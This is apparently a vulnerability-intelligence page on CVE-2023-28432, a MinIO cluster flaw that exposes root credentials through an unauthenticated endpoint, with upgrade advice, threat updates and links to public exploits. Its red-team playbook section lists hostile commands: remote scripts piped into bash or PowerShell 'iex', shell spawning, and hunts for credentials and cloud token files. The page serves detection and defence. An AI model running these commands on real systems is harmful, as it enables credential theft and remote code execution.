CVE-2023-28432
Overview
This vulnerability is an information disclosure flaw caused by improper handling of environment variables in the MinIO distributed cluster deployment. Specifically, the system exposes sensitive environment variables such as MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD via an unauthenticated HTTP endpoint. The affected component is the cluster bootstrap verification API, which inadvertently returns all environment variables in its response.
Vulnerability Description
Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including `MINIO_SECRET_KEY` and `MINIO_ROOT_PASSWORD`, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.
Impact
An unauthenticated attacker can retrieve sensitive credentials such as secret keys and root passwords from the MinIO cluster. This enables unauthorized access to the object storage environment, potentially allowing data exfiltration, unauthorized data modification, or further lateral movement within the infrastructure. No user interaction or prior authentication is required to exploit this vulnerability, increasing its severity in exposed environments.
Solution
Users should upgrade MinIO to RELEASE.2023-03-20T20-16-18Z or later, as this version addresses the information disclosure issue. The vendor advisory GHSA-6xvq-wj2x-3h3q provides detailed patch instructions and release notes. No alternative workarounds are documented; thus, timely upgrading is the recommended remediation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the MinIO multi-cloud object storage framework arises from its improper handling of sensitive environment variables in a distributed cluster deployment. Specifically, the affected versions expose critical configuration details, including the `MINIO_SECRET_KEY` and `MINIO_ROOT_PASSWORD`, through the system's environment variable interface. This flaw occurs in deployments starting from a specific release date and extends to earlier versions, allowing unauthorized access to sensitive credentials that are crucial for the secure operation of the storage service. The exposure of these variables can lead to unauthorized access to the MinIO instance, potentially compromising the integrity and confidentiality of stored data.
Attack vectors for exploiting this vulnerability are varied and can be executed by an adversary with access to the MinIO cluster. An attacker could leverage this information disclosure to gain unauthorized access to the object storage system, allowing them to manipulate, delete, or exfiltrate sensitive data. Scenarios may include an insider threat where a malicious user with limited access escalates their privileges by utilizing the exposed credentials. Additionally, external attackers who manage to infiltrate the network could exploit this vulnerability to gain foothold within the system, leading to further attacks on other connected services or data repositories.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on MinIO for critical data storage and management. The exposure of sensitive credentials can lead to severe business risks, including data breaches, loss of customer trust, regulatory fines, and potential legal ramifications. Organizations that store personally identifiable information (PII), financial records, or intellectual property are particularly vulnerable, as the compromise of such data can have lasting repercussions on their operations and reputation. Furthermore, the potential for data manipulation or destruction can disrupt business continuity and lead to substantial financial losses.
To detect and mitigate the risks associated with this vulnerability, organizations should prioritize upgrading to the latest version of MinIO, which addresses the issue by securing the handling of environment variables. Regularly auditing the deployment environment for exposure of sensitive information is also crucial. Implementing robust access controls and monitoring systems can help detect unauthorized access attempts and alert administrators to potential breaches. Additionally, employing security best practices, such as encrypting sensitive data at rest and in transit, can further minimize the impact of any potential exploitation.
In conclusion, the vulnerability in the MinIO object storage framework highlights the critical importance of safeguarding sensitive configuration details within distributed systems. Organizations must remain vigilant in their security practices, ensuring that they are using the latest software versions and implementing comprehensive monitoring and access controls. By understanding the implications of such vulnerabilities and proactively addressing them, businesses can better protect their data assets and maintain trust with their stakeholders.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2023-28432, with a doubling of observed exploitation attempts in recent telemetry. This increase coincides with the continued availability and refinement of multiple proof-of-concept exploits on public repositories, which lowers the barrier for adversaries to leverage the vulnerability. The sustained high EPSS score underscores persistent exploitation potential despite stable short-term trends. For defenders, this surge signals an elevated likelihood of opportunistic scanning and targeted attacks against vulnerable MinIO cluster deployments, increasing the urgency for detection and response capabilities. While ransomware linkage remains unconfirmed, the exposure of critical secrets such as root passwords continues to present a high-impact risk vector that could facilitate broader compromise. Consequently, the threat level associated with this vulnerability should be considered elevated, reflecting both increased attacker activity and the ease of exploitation afforded by publicly accessible tools.
Update 2 — May 15, 2026
CSURFACE threat intelligence has detected a marked escalation in scanning and exploitation attempts targeting CVE-2023-28432, accompanied by the emergence of multiple new proof-of-concept exploits and automated scanning tools on public repositories. This surge in adversary activity underscores an increasing attacker focus on leveraging the vulnerability to extract sensitive environment variables, including critical credentials such as root passwords. Our telemetry indicates that while the overall exploit sophistication remains moderate, the accessibility of these tools lowers the barrier to entry for less skilled threat actors, broadening the pool of potential attackers. The slight uptick in the EPSS score corroborates this trend, reflecting a growing likelihood of exploitation in the wild. Although there remains no confirmed linkage to ransomware operations, the expanded exploitation footprint elevates the risk of lateral movement and persistent compromise within affected environments. Consequently, the threat level associated with CVE-2023-28432 should be considered heightened, emphasizing the urgency for enhanced detection and response measures to mitigate potential data exposure and downstream impacts.
Update 3 — July 04, 2026
CSURFACE threat intelligence has detected a notable surge in exploitation attempts targeting CVE-2023-28432, accompanied by the emergence of additional publicly available proof-of-concept exploits. Our telemetry indicates that adversaries are increasingly leveraging unauthenticated POST requests to the vulnerable MinIO endpoint to extract sensitive environment variables, including administrative credentials. This escalation broadens the attacker base beyond opportunistic scanning to more targeted reconnaissance and potential credential harvesting campaigns. Although ransomware affiliations remain unconfirmed, the expanded exploitation activity elevates the risk of unauthorized access and lateral movement within affected distributed MinIO deployments. Consequently, the threat level associated with this vulnerability has intensified, underscoring a growing urgency for vigilant monitoring and rapid incident response to contain potential breaches.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Minio | Minio | All |
cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
MinIO Bootstrap Verify Information Disclosure
auxiliary/gather/minio_bootstrap_verify_info_disc
|
joel @ ndepthsecurity, RicterZ | Unknown | - | View |
GitHub PoCs (19)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
MzzdToT/CVE-2023-28432
MinIO敏感信息泄露漏洞批量扫描poc&exp
|
MzzdToT | 37 | 11 | 2023-03-24 | View |
|
Mr-xn/CVE-2023-28432
CVE-2023-28434 nuclei templates
|
Mr-xn | 34 | 8 | 2023-03-23 | View |
|
acheiii/CVE-2023-28432
CVE-2023-28432 POC
|
acheiii | 15 | 2 | 2023-03-24 | View |
|
Chocapikk/CVE-2023-28432
Automated vulnerability scanner for CVE-2023-28432 in Minio deployments, revealing sensitive environment variables.
|
Chocapikk | 11 | 1 | 2023-09-05 | View |
|
gobysec/CVE-2023-28432
MiniO verify interface sensitive information disclosure vulnerability (CVE-2023-28432)
|
gobysec | 10 | 0 | 2023-03-23 | View |
|
Cuerz/CVE-2023-28432
CVE-2023-28432 MinIO敏感信息泄露检测脚本
|
Cuerz | 10 | 0 | 2023-03-29 | View |
|
Okaytc/minio_unauth_check
CVE-2023-28432,minio未授权访问检测工具
|
Okaytc | 7 | 1 | 2023-03-24 | View |
|
yTxZx/CVE-2023-28432
|
yTxZx | 3 | 2 | 2023-10-20 | View |
|
xk-mt/CVE-2023-28432
minio系统存在信息泄露漏洞,未经身份认证的远程攻击,通过发送特殊POST请求到/minio/bootstrap/v1/verify即可获取所有敏感信息,其中包括MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD,可...
|
xk-mt | 1 | 2 | 2024-01-11 | View |
|
TaroballzChen/CVE-2023-28432-metasploit-scanner
MinIO Information Disclosure Vulnerability scanner by metasploit
|
TaroballzChen | 1 | 2 | 2023-05-27 | View |
|
BitWiz4rd/CVE-2023-28432
PoC MinIO vulnerability exploit
|
BitWiz4rd | 2 | 0 | 2024-04-13 | View |
|
steponeerror/Cve-2023-28432-
通过vulhub的复现过程实现了,基本的批量检测。比较垃圾但是勉强能用
|
steponeerror | 2 | 0 | 2023-03-27 | View |
|
LHXHL/Minio-CVE-2023-28432
|
LHXHL | 1 | 0 | 2023-04-06 | View |
|
C1ph3rX13/CVE-2023-28432
CVE-2023-28432 Minio Information isclosure Exploit
|
C1ph3rX13 | 1 | 0 | 2023-12-07 | View |
|
netuseradministrator/CVE-2023-28432
|
netuseradministrator | 1 | 0 | 2024-01-07 | View |
|
unam4/CVE-2023-28432-minio_update_rce
https://github.com/AbelChe/evil_minio/tree/main 打包留存
|
unam4 | 1 | 0 | 2023-11-26 | View |
|
h0ng10/CVE-2023-28432_docker
Test environments for CVE-2023-28432, information disclosure in MinIO clusters
|
h0ng10 | 0 | 0 | 2023-04-09 | View |
|
NET-Flowers/CVE-2023-28432
CVE-2023-28432检测工具
|
NET-Flowers | 0 | 0 | 2023-08-28 | View |
|
CHINA-china/MinIO_CVE-2023-28432_EXP
|
CHINA-china | 0 | 0 | 2023-04-13 | View |
Threat Feed
22 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-28432 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/minio/minio/releases/tag/RELEASE.2023-03-20T20-16-18Z |
| twitter.com |
GitHub CVE
|
https://twitter.com/Andrew___Morris/status/1639325397241278464 |
| viz.greynoise.io |
GitHub CVE
|
https://viz.greynoise.io/tag/minio-information-disclosure-attempt |
| greynoise.io |
GitHub CVE
|
https://www.greynoise.io/blog/openai-minio-and-why-you-should-always-use-docker-cli-scan-to-keep-your-supply-chain-clean |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-28432 |